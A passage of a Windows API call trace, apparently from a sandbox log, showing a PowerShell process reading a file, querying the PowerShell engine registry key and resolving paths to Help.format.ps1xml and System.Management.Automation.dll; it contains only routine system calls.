	[0335.836] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.837] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.837] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.837] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.838] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.838] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.838] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.838] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.839] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.839] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.839] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.839] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.859] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.859] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.860] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.860] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.860] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.860] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.860] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.864] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0xf37, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4e2cf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4e2cf*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0335.869] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0335.870] CloseHandle (hObject=0x304) returned 1
	[0335.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0335.870] SetErrorMode (uMode=0x1) returned 0x1
	[0335.870] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0335.870] SetErrorMode (uMode=0x1) returned 0x1
	[0335.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0335.870] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x304) returned 0x0
	[0335.870] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0335.870] CoTaskMemAlloc (cb=0x5a) returned 0x184950
	[0335.870] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x184950, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0335.871] CoTaskMemFree (pv=0x184950) 
	[0335.871] RegCloseKey (hKey=0x304) returned 0x0
	[0335.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0335.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0336.342] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x9e0693d6, Data2=0x490b, Data3=0x4745, Data4=([0]=0x87, [1]=0x38, [2]=0xdb, [3]=0x8c, [4]=0xc6, [5]=0x1, [6]=0x3e, [7]=0x15))) returned 0x0
	[0336.342] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x69e6a199, Data2=0x2913, Data3=0x4077, Data4=([0]=0x88, [1]=0x8e, [2]=0xc5, [3]=0x59, [4]=0xc7, [5]=0x4f, [6]=0xf5, [7]=0x79))) returned 0x0
	[0336.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.793] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x8e4c4820, Data2=0x18d5, Data3=0x4e97, Data4=([0]=0xb2, [1]=0xde, [2]=0x3a, [3]=0x6b, [4]=0xf1, [5]=0xd8, [6]=0xe2, [7]=0x16))) returned 0x0
	[0336.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
